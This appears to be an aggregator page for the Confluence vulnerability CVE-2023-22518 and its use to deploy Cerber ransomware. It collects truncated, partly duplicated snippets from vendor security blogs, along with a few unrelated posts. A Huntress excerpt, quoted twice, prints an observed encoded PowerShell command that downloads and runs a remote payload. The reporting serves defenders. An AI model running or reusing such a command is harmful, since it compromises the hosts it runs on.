CVE-2023-22518 [CRITICAL] C3RB3R Ransomware | Ongoing Exploitation of CVE-2023-22518 Targets Unpatched Confluence Servers
SentinelOne is currently monitoring increased exploitation of CVE-2023-22518, a recently identified vulnerability in Atlassian’s Confluence Datacenter and Server software. We have observed multiple campaigns leveraging the bug to deploy new C3RB3R (Cerber) ransomware variants targeting both Windows and Linux hosts.
In this post, we detail the attack chain observed in these incidents and provide recent indicators to help responders and threat hunters identify and mitigate similar attacks in these ongoing campaigns.
## Background
CVE-2023-22518 is an improper authorization vulnerability of all versions of Atlassian’s Confluence Data Center and Server which allows for an unauthenticated remote attacker to create a backdoor administrator account for an exposed Confluence instance. The remot
Trendmicro
Cerber Ransomware Exploits Atlassian Confluence Vulnerability CVE-2023-22518
blogs_trendmicro·2023-11-10·CVSS 9.8
CVE-2023-22518 [CRITICAL] Cerber Ransomware Exploits Atlassian Confluence Vulnerability CVE-2023-22518
Ausnutzung von Schwachstellen
## Cerber Ransomware Exploits Atlassian Confluence Vulnerability CVE-2023-22518
We encountered the Cerber ransomware exploiting the Atlassian Confluence vulnerability CVE-2023-22518 in its operations.
By: Sophia Nilette Robles, Andrei Alimboyao, Jacob Santos, Maristel Policarpio, Nathaniel Morales, Ivan Nicole Chavez Nov 10, 2023 Read time: ( words)
Save to Folio
On October 31, 2023, Atlassian published an advisory on CVE-2023-22518, an Improper authorization vulnerability involving the Confluence Data Center and Server. Initially reported to cause data loss, it was eventually revealed that exploiting this vulnerability allows unauthorized users to reset and create a Confluence instance administrator account, allowing them to perform all admin privileges
Trendmicro
Cerber Ransomware Exploits Atlassian Confluence Vulnerability CVE-2023-22518
blogs_trendmicro·2023-11-10·CVSS 9.8
CVE-2023-22518 [CRITICAL] Cerber Ransomware Exploits Atlassian Confluence Vulnerability CVE-2023-22518
Exploits y vulnerabilidades
## Cerber Ransomware Exploits Atlassian Confluence Vulnerability CVE-2023-22518
We encountered the Cerber ransomware exploiting the Atlassian Confluence vulnerability CVE-2023-22518 in its operations.
By: Sophia Nilette Robles, Andrei Alimboyao, Jacob Santos, Maristel Policarpio, Nathaniel Morales, Ivan Nicole Chavez Nov 10, 2023 Read time: ( words)
Save to Folio
On October 31, 2023, Atlassian published an advisory on CVE-2023-22518, an Improper authorization vulnerability involving the Confluence Data Center and Server. Initially reported to cause data loss, it was eventually revealed that exploiting this vulnerability allows unauthorized users to reset and create a Confluence instance administrator account, allowing them to perform all admin privileges av
Trendmicro
Cerber Ransomware Exploits Atlassian Confluence Vulnerability CVE-2023-22518
blogs_trendmicro·2023-11-10·CVSS 9.8
CVE-2023-22518 [CRITICAL] Cerber Ransomware Exploits Atlassian Confluence Vulnerability CVE-2023-22518
Sfruttamento vulnerabilità
## Cerber Ransomware Exploits Atlassian Confluence Vulnerability CVE-2023-22518
We encountered the Cerber ransomware exploiting the Atlassian Confluence vulnerability CVE-2023-22518 in its operations.
By: Sophia Nilette Robles, Andrei Alimboyao, Jacob Santos, Maristel Policarpio, Nathaniel Morales, Ivan Nicole Chavez Nov 10, 2023 Read time: ( words)
Save to Folio
On October 31, 2023, Atlassian published an advisory on CVE-2023-22518, an Improper authorization vulnerability involving the Confluence Data Center and Server. Initially reported to cause data loss, it was eventually revealed that exploiting this vulnerability allows unauthorized users to reset and create a Confluence instance administrator account, allowing them to perform all admin privileges ava
Trendmicro
Cerber Ransomware Exploits Atlassian Confluence Vulnerability CVE-2023-22518
blogs_trendmicro·2023-11-10·CVSS 9.8
CVE-2023-22518 [CRITICAL] Cerber Ransomware Exploits Atlassian Confluence Vulnerability CVE-2023-22518
Exploits & Vulnerabilities
## Cerber Ransomware Exploits Atlassian Confluence Vulnerability CVE-2023-22518
We encountered the Cerber ransomware exploiting the Atlassian Confluence vulnerability CVE-2023-22518 in its operations.
By: Sophia Nilette Robles, Andrei Alimboyao, Jacob Santos, Maristel Policarpio, Nathaniel Morales, Ivan Nicole Chavez 2023/11/10 Read time: ( words)
Save to Folio
On October 31, 2023, Atlassian published an advisory on CVE-2023-22518, an Improper authorization vulnerability involving the Confluence Data Center and Server. Initially reported to cause data loss, it was eventually revealed that exploiting this vulnerability allows unauthorized users to reset and create a Confluence instance administrator account, allowing them to perform all admin privileges avail
Trendmicro
Cerber Ransomware Exploits Atlassian Confluence Vulnerability CVE-2023-22518
blogs_trendmicro·2023-11-10·CVSS 9.8
CVE-2023-22518 [CRITICAL] Cerber Ransomware Exploits Atlassian Confluence Vulnerability CVE-2023-22518
Exploits & Vulnerabilities
# Cerber Ransomware Exploits Atlassian Confluence Vulnerability CVE-2023-22518
We encountered the Cerber ransomware exploiting the Atlassian Confluence vulnerability CVE-2023-22518 in its operations.
By: Sophia Nilette Robles, Andrei Alimboyao, Jacob Santos, Maristel Policarpio, Nathaniel Morales, Ivan Nicole Chavez
2023/11/10
Read time: ( words)
Save to Folio
On October 31, 2023, Atlassian published an advisory on CVE-2023-22518, an Improper authorization vulnerability involving the Confluence Data Center and Server. Initially reported to cause data loss, it was eventually revealed that exploiting this vulnerability allows unauthorized users to reset and create a Confluence instance administrator account, allowing them to perform all admin privileges avail
Trendmicro
Cerber Ransomware Exploits Atlassian Confluence Vulnerability CVE-2023-22518
blogs_trendmicro·2023-11-10·CVSS 9.8
CVE-2023-22518 [CRITICAL] Cerber Ransomware Exploits Atlassian Confluence Vulnerability CVE-2023-22518
Exploits & Vulnerabilities
## Cerber Ransomware Exploits Atlassian Confluence Vulnerability CVE-2023-22518
We encountered the Cerber ransomware exploiting the Atlassian Confluence vulnerability CVE-2023-22518 in its operations.
By: Sophia Nilette Robles, Andrei Alimboyao, Jacob Santos, Maristel Policarpio, Nathaniel Morales, Ivan Nicole Chavez Nov 10, 2023 Read time: ( words)
Save to Folio
On October 31, 2023, Atlassian published an advisory on CVE-2023-22518, an Improper authorization vulnerability involving the Confluence Data Center and Server. Initially reported to cause data loss, it was eventually revealed that exploiting this vulnerability allows unauthorized users to reset and create a Confluence instance administrator account, allowing them to perform all admin privileges ava
Talos
A new video series, Google Forms spam and the various gray areas of cyber attacks
blogs_talos·2023-11-09
A new video series, Google Forms spam and the various gray areas of cyber attacks
I found the juxtaposition of stories on the Talos blog over the past week-plus kind of funny.
On one hand, we had a massive story about Arid Viper, a Middle Eastern threat actor spreading spyware, one of the most dangerous types of malware out there right now, operating out of Gaza no less.
Then, we had “Roblox,” a children’s video game (which I’ve written about multiple times and I maintain was the OG metaverse).
The scale of these attacks is obviously vastly different. Spyware is being used across the globe to monitor some of the most vulnerable activists, journalists and government officials to track their physical movement.
Meanwhile, “Roblox” players are losing money in a game where the characters look like vague LEGO minifigure knockoffs.
And the blog homepage is just a perfect
Talos
A new video series, Google Forms spam and the various gray areas of cyber attacks
blogs_talos·2023-11-09
A new video series, Google Forms spam and the various gray areas of cyber attacks
## A new video series, Google Forms spam and the various gray areas of cyber attacks
I found the juxtaposition of stories on the Talos blog over the past week-plus kind of funny.
On one hand, we had a massive story about Arid Viper , a Middle Eastern threat actor spreading spyware, one of the most dangerous types of malware out there right now, operating out of Gaza no less.
Then, we had “Roblox,” a children’s video game (which I’ve written about multiple times and I maintain was the OG metaverse).
The scale of these attacks is obviously vastly different. Spyware is being used across the globe to monitor some of the most vulnerable activists, journalists and government officials to track their physical movement.
Meanwhile, “Roblox” players are losing money in a game where the characte
Huntress
Confluence to Cerber: Exploitation of CVE-2023-22518
blogs_huntress·2023-11-07·CVSS 9.8
CVE-2023-22518 [CRITICAL] Confluence to Cerber: Exploitation of CVE-2023-22518
On October 31, 2023, Atlassian published patches and an advisory for CVE-2023-22518 , an improper authorization vulnerability affecting Confluence Data Center and Confluence Server. Later, on November 3, 2023, additional information was released from Atlassian identifying in-the-wild exploitation of CVE-2023-22518. In addition to observations from other organizations , Huntress can confirm active exploitation starting on November 3 post patch release.
Specifically, at 08:25 UTC on November 3, 2023, Huntress identified an encoded PowerShell command attempting to download and execute a remote payload:
powershell.exe -exec bypass -nop -enc
SQBFAFgAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA5ADMAL
Checkpoint
6th November – Threat Intelligence Report
blogs_checkpoint·2023-11-06
CVE-2023-22518 6th November – Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 6th November – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 6th November, please download our Threat_Intelligence Bulletin .
TOP ATTACKS AND BREACHES
Boeing has acknowledged that a cyber-attack had affected its parts and distribution business, and that the company is working with law enforcement to investigate. Earlier this week, ransomware group LockBit has added Boeing to its victim page and claimed to have stolen large amounts of data.
Check Point Harmony Endpoint
Tenable
CVE-2023-22518: Critical Atlassian Confluence Data Center and Server Improper Authorization Vulnerability
blogs_tenable·2023-11-03·CVSS 9.8
[CRITICAL] CVE-2023-22518: Critical Atlassian Confluence Data Center and Server Improper Authorization Vulnerability
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Sentinelone
So, State-Sponsored Attackers Are Targeting Your Mobile Device. Now What?
blogs_sentinelone·2023-11-02
So, State-Sponsored Attackers Are Targeting Your Mobile Device. Now What?
Earlier this week, Apple notified a number of individuals that their iPhones had apparently been targeted by state-sponsored attackers. Around a dozen iPhone users , including journalists and politicians in India’s opposition parties, are said to have received the alerts. Apple began warning its users that they could be being targeted by sophisticated, nation-state hackers in 2021, after the discovery that Pegasus spyware was widely being used by governments and other entities to compromise mobile devices. Since then, individuals in over 150 countries have been notified of potential nation-state hacks against their Apple devices.
Receiving an alert, however, leaves users with little to no indication of how they are being targeted or by whom. The wording of the alert even suggests it might
Wiz
Crying Out Cloud - November Newsletter | Wiz
blogs_wiz·2023-11-01·CVSS 9.8
CVE-2023-42115 [CRITICAL] Crying Out Cloud - November Newsletter | Wiz
The past month has brought a series of vulnerabilities and security incidents that have left users affected. Amidst the noise, we've taken it upon ourselves to curate the most significant developments for you.
Here are our top picks of cloud security highlights!
## 🐞 High Profile Vulnerabilities
## Critical and high severity 0day vulnerabilities in Exim
Multiple vulnerabilities were disclosed in Exim Mail Transfer Agent (MTA), including CVE-2023-42115, which is a critical vulnerability enabling unauthenticated attackers to remotely execute code on publicly exposed Exim servers with a specific non-default configuration. This issue results from improper input validation that leads to writing arbitrary code past the end of the buffer.
According to Wiz data, although Exim is very prevalen
Bleepingcomputer
Atlassian warns of critical Confluence flaw leading to data loss
blogs_bleepingcomputer·2023-10-31·CVSS 9.8
CVE-2023-22518 [CRITICAL] Atlassian warns of critical Confluence flaw leading to data loss
## Atlassian warns of critical Confluence flaw leading to data loss
## Sergiu Gatlan
Australian software company Atlassian warned admins to immediately patch Internet-exposed Confluence instances against a critical security flaw that could lead to data loss following successful exploitation.
Described as an improper authorization vulnerability affecting all versions of Confluence Data Center and Confluence Server software, the bug is tracked as CVE-2023-22518 and puts publicly accessible instances at critical risk.
While threat actors could use the flaw to destroy data on affected servers, the bug doesn't impact confidentiality as it can't be exploited to exfiltrate instance data. Atlassian Cloud sites accessed via an atlassian.net domain are also unaffected by this vulnerability.
"As
Huntress
Confluence to Cerber: Exploitation of CVE-2023-22518 | Huntress
blogs_huntress·CVSS 9.8
CVE-2023-22518 [CRITICAL] Confluence to Cerber: Exploitation of CVE-2023-22518 | Huntress
On October 31, 2023, Atlassian published patches and an advisory for CVE-2023-22518, an improper authorization vulnerability affecting Confluence Data Center and Confluence Server. Later, on November 3, 2023, additional information was released from Atlassian identifying in-the-wild exploitation of CVE-2023-22518. In addition to observations from other organizations, Huntress can confirm active exploitation starting on November 3 post patch release.
Specifically, at 08:25 UTC on November 3, 2023, Huntress identified an encoded PowerShell command attempting to download and execute a remote payload:
powershell.exe -exec bypass -nop -enc
SQBFAFgAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA5ADMALgA
Sentinelone
Cerber
blogs_sentinelone·CVSS 9.8
[CRITICAL] Cerber
# Cerber Ransomware: In-Depth Analysis, Detection, and Mitigation
## What Is Cerber Ransomware?
Cerber (aka C3RB3R) ransomware operates as a semi-private Ransomware-as-a-Service (RaaS) and was first observed in 2016. Cerber operations peaked between 2016 and 2017 followed by long lapses of inactivity. From 2020 onward, there have been sporadic Cerber campaigns with contemporary payloads supporting both Linux and Windows operating systems. In late 2023, Cerber resurfaced in new campaigns targeting exposed Atlassian Confluence Datacenter and Server products using CVE-2023-22518.
## What Does CerberRansomware Target?
Cerber ransomware operates as an RaaS and targeting will vary depending on the affiliate. Cerber ransomware operators target multiple industries with little to no discriminat
Greynoiseio
Spike in Atlassian Exploitation Attempts: Patching is Crucial
blogs_greynoiseio
Spike in Atlassian Exploitation Attempts: Patching is Crucial
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
arXiv
Efficacy of EPSS in High Severity CVEs found in KEV
arxiv_fulltext·2024-11-04
Efficacy of EPSS in High Severity CVEs found in KEV
empty
empty
24pt
10pt plus 1.0pt minus 2.0pt
## Abstract
The Exploit Prediction Scoring System (EPSS) is designed to assess the probability of a vulnerability being exploited in the next 30 days relative to other vulnerabilities. The latest version, based on a research paper published in arXiv , assists defenders in deciding which vulnerabilities to prioritize for remediation. This study evaluates EPSS's ability to predict exploitation before vulnerabilities are actively compromised, focusing on high severity CVEs that are known to have been exploited and included in the CISA KEV catalog. By analyzing EPSS score history, the availability and simplicity of exploits, the system's purpose, its value as a target for Threat Actors (TAs), this paper examines EPSS's potential and identifies ar
http://packetstormsecurity.com/files/176264/Atlassian-Confluence-Improper-Authorization-Code-Execution.htmlhttps://confluence.atlassian.com/pages/viewpage.action?pageId=1311473907https://jira.atlassian.com/browse/CONFSERVER-93142http://packetstormsecurity.com/files/176264/Atlassian-Confluence-Improper-Authorization-Code-Execution.htmlhttps://confluence.atlassian.com/pages/viewpage.action?pageId=1311473907https://jira.atlassian.com/browse/CONFSERVER-93142https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-22518
2023-10-31
Published
2023-11-07
Added to CISA KEV
Exploited in the wild